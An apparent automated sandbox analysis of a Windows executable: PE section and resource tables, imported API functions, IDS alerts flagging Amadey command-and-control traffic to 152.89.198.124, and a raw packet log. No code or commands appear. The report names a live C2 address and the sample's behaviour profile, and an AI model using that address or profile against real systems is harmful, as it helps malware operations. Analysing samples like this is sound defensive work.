                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xcb0000x110000x11000931c5acec7552f54b7edf93eb214342fFalse0.18794519761029413data3.7219664045616785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                                                                                RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                                                                                RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                                                                                RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                                                                                RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                                                                                RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                                                                                RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                                                                                RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                                                                                RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                                                                                RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                                                                                RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                                                                                RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                                                                                RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                                                                                RT_STRING0xd8e000x3f8data0.3198818897637795
                                                                                                RT_STRING0xd91f80x2dcdata0.36475409836065575
                                                                                                RT_STRING0xd94d40x430data0.40578358208955223
                                                                                                RT_STRING0xd99040x44cdata0.38636363636363635
                                                                                                RT_STRING0xd9d500x2d4data0.39226519337016574
                                                                                                RT_STRING0xda0240xb8data0.6467391304347826
                                                                                                RT_STRING0xda0dc0x9cdata0.6410256410256411
                                                                                                RT_STRING0xda1780x374data0.4230769230769231
                                                                                                RT_STRING0xda4ec0x398data0.3358695652173913
                                                                                                RT_STRING0xda8840x368data0.3795871559633027
                                                                                                RT_STRING0xdabec0x2a4data0.4275147928994083
                                                                                                RT_RCDATA0xdae900x10data1.5
                                                                                                RT_RCDATA0xdaea00x310data0.6173469387755102
                                                                                                RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                                                                                RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                                                                                RT_VERSION0xdb2980x584dataEnglishUnited States0.29107648725212465
                                                                                                RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                                                                                                DLLImport
                                                                                                kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                comctl32.dllInitCommonControls
                                                                                                user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                                                                NameOrdinalAddress
                                                                                                __dbk_fcall_wrapper20x40fc10
                                                                                                dbkFCallWrapperAddr10x4b063c
                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-10-27T17:11:04.069020+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457723152.89.198.12480TCP
                                                                                                2024-10-27T17:11:06.682086+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.457736152.89.198.12480TCP
                                                                                                2024-10-27T17:11:09.075978+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457751152.89.198.12480TCP
                                                                                                2024-10-27T17:11:14.044735+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457783152.89.198.12480TCP
                                                                                                2024-10-27T17:11:18.955990+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457808152.89.198.12480TCP
                                                                                                2024-10-27T17:11:23.888441+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457835152.89.198.12480TCP
                                                                                                2024-10-27T17:11:29.299694+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457862152.89.198.12480TCP
                                                                                                2024-10-27T17:11:34.330315+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457893152.89.198.12480TCP
                                                                                                2024-10-27T17:11:39.303022+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457920152.89.198.12480TCP
                                                                                                2024-10-27T17:11:44.290710+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457947152.89.198.12480TCP
                                                                                                2024-10-27T17:11:49.677794+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457979152.89.198.12480TCP
                                                                                                2024-10-27T17:11:54.997339+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.457998152.89.198.12480TCP
                                                                                                2024-10-27T17:11:59.950646+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.458000152.89.198.12480TCP
                                                                                                2024-10-27T17:12:04.953738+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.458002152.89.198.12480TCP
                                                                                                2024-10-27T17:12:09.870564+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.458004152.89.198.12480TCP
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 27, 2024 17:10:07.240705967 CET49675443192.168.2.4173.222.162.32
                                                                                                Oct 27, 2024 17:10:23.476097107 CET4972380192.168.2.42.19.126.163
                                                                                                Oct 27, 2024 17:10:23.482933044 CET80497232.19.126.163192.168.2.4
                                                                                                Oct 27, 2024 17:10:23.483001947 CET4972380192.168.2.42.19.126.163
                                                                                                Oct 27, 2024 17:10:37.791630983 CET8049724217.20.57.22192.168.2.4
                                                                                                Oct 27, 2024 17:10:37.791780949 CET4972480192.168.2.4217.20.57.22
                                                                                                Oct 27, 2024 17:10:37.795593977 CET4972480192.168.2.4217.20.57.22
                                                                                                Oct 27, 2024 17:10:37.803261042 CET8049724217.20.57.22192.168.2.4
                                                                                                Oct 27, 2024 17:10:46.490959883 CET4973180192.168.2.4104.18.38.233
                                                                                                Oct 27, 2024 17:10:46.491097927 CET4973280192.168.2.4172.64.149.23
                                                                                                Oct 27, 2024 17:10:46.491152048 CET4973080192.168.2.4104.18.38.233
                                                                                                Oct 27, 2024 17:10:46.497849941 CET8049731104.18.38.233192.168.2.4
                                                                                                Oct 27, 2024 17:10:46.497895002 CET8049732172.64.149.23192.168.2.4
                                                                                                Oct 27, 2024 17:10:46.497925997 CET4973180192.168.2.4104.18.38.233
                                                                                                Oct 27, 2024 17:10:46.497952938 CET4973280192.168.2.4172.64.149.23
                                                                                                Oct 27, 2024 17:10:46.498943090 CET8049730104.18.38.233192.168.2.4
                                                                                                Oct 27, 2024 17:10:46.498991966 CET4973080192.168.2.4104.18.38.233
                                                                                                Oct 27, 2024 17:10:48.796286106 CET5770953192.168.2.4162.159.36.2
                                                                                                Oct 27, 2024 17:10:48.801686049 CET5357709162.159.36.2192.168.2.4
                                                                                                Oct 27, 2024 17:10:48.801755905 CET5770953192.168.2.4162.159.36.2
                                                                                                Oct 27, 2024 17:10:48.801806927 CET5770953192.168.2.4162.159.36.2
                                                                                                Oct 27, 2024 17:10:48.807133913 CET5357709162.159.36.2192.168.2.4
                                                                                                Oct 27, 2024 17:10:49.412401915 CET5357709162.159.36.2192.168.2.4
                                                                                                Oct 27, 2024 17:10:49.413291931 CET5770953192.168.2.4162.159.36.2
                                                                                                Oct 27, 2024 17:10:49.419333935 CET5357709162.159.36.2192.168.2.4
                                                                                                Oct 27, 2024 17:10:49.419399023 CET5770953192.168.2.4162.159.36.2
                                                                                                Oct 27, 2024 17:10:59.917789936 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:10:59.917850018 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:10:59.917924881 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:10:59.918173075 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:10:59.918189049 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.654567957 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.654652119 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:00.656388998 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:00.656418085 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.656754017 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.666636944 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:00.707374096 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.746740103 CET5771380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:00.752176046 CET8057713152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.752262115 CET5771380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:00.752402067 CET5771380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:00.757750034 CET8057713152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.908158064 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.908215046 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.908257961 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.908401012 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:00.908401012 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:00.908444881 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:00.908500910 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.030085087 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.030134916 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.030172110 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.030183077 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.030200958 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.030224085 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.145075083 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.145097017 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.145148993 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.145165920 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.145194054 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.145206928 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.260734081 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.260760069 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.260876894 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.260931969 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.260962963 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.260982990 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.376456976 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.376478910 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.376564980 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.376588106 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.376638889 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.376638889 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.492127895 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.492152929 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.492198944 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.492249012 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.492278099 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.492297888 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.608074903 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.608120918 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.608161926 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.608189106 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.608222008 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.608254910 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.637686014 CET8057713152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.640880108 CET5771380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:01.651046038 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.651093960 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.651130915 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.651146889 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.651180029 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.651200056 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.766807079 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.766855001 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.766995907 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.766995907 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.767019033 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.769017935 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.881738901 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.881788969 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.881822109 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.881841898 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.882003069 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.882003069 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.955239058 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.955284119 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.955430031 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.955430031 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:01.955471992 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:01.956950903 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.040306091 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.040349960 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.040492058 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.040493011 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.040512085 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.041874886 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.113511086 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.113554955 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.113596916 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.113616943 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.113785982 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.113806963 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.156219959 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.156326056 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.156342030 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.156402111 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.156493902 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.156493902 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.156493902 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.156543016 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.198945045 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.198956013 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.199029922 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.199032068 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.199130058 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.199443102 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.199446917 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.199472904 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.199558973 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.199594975 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.200706005 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.200764894 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.200828075 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.200974941 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.200985909 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.201904058 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.201931000 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.201993942 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.202140093 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.202156067 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.202764034 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.202773094 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.202824116 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.202931881 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.202940941 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.459517002 CET57712443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.459554911 CET4435771213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.934799910 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.935153961 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.935288906 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.935355902 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.935669899 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.935684919 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.935930967 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.935952902 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.936367035 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.936372042 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.952151060 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.952501059 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.952533960 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.952872038 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.952877998 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.960660934 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.960941076 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.961014986 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.961281061 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.961294889 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.961447001 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.961668968 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.961678028 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:02.961997032 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:02.962001085 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.067996979 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.068053961 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.068228006 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.068258047 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.068289995 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.068325996 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.068367958 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.068416119 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.068416119 CET57714443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.068450928 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.068471909 CET4435771413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.068913937 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.069087982 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.069142103 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.069205046 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.069226027 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.069240093 CET57717443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.069247007 CET4435771713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.070977926 CET57719443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.071001053 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.071089029 CET57719443192.168.2.413.107.246.51
